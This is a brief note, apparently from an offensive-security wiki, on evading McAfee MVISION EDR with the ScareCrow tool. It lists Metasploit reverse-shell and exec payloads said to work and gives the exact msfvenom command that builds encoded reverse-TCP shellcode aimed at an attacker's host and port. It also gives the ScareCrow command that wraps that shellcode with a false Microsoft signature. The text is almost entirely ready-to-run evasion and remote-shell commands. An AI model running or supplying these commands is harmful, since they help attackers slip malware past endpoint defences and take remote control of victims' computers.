McAfee MVISION
Bypassing using ScareCrow
You can use the scarecrow tool to bypass McAfee EDR. We tested 3 types of metasploit payloads that work, they are:
- windows/x64/shell/reverse_tcp 
- windows/x64/meterpreter_reverse_https 
- windows/x64/exec 
Commands:
$ msfvenom -p windows/x64/shell/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f raw -a x64 -e x64/xor > shellcode.bin 
$ ./ScareCrow_4.11_linux_amd64 -I shellcode.bin -domain microsoft.com It obscures itself to circumvent protections and also contains a false signature to give more credibility to the target. 
Last updated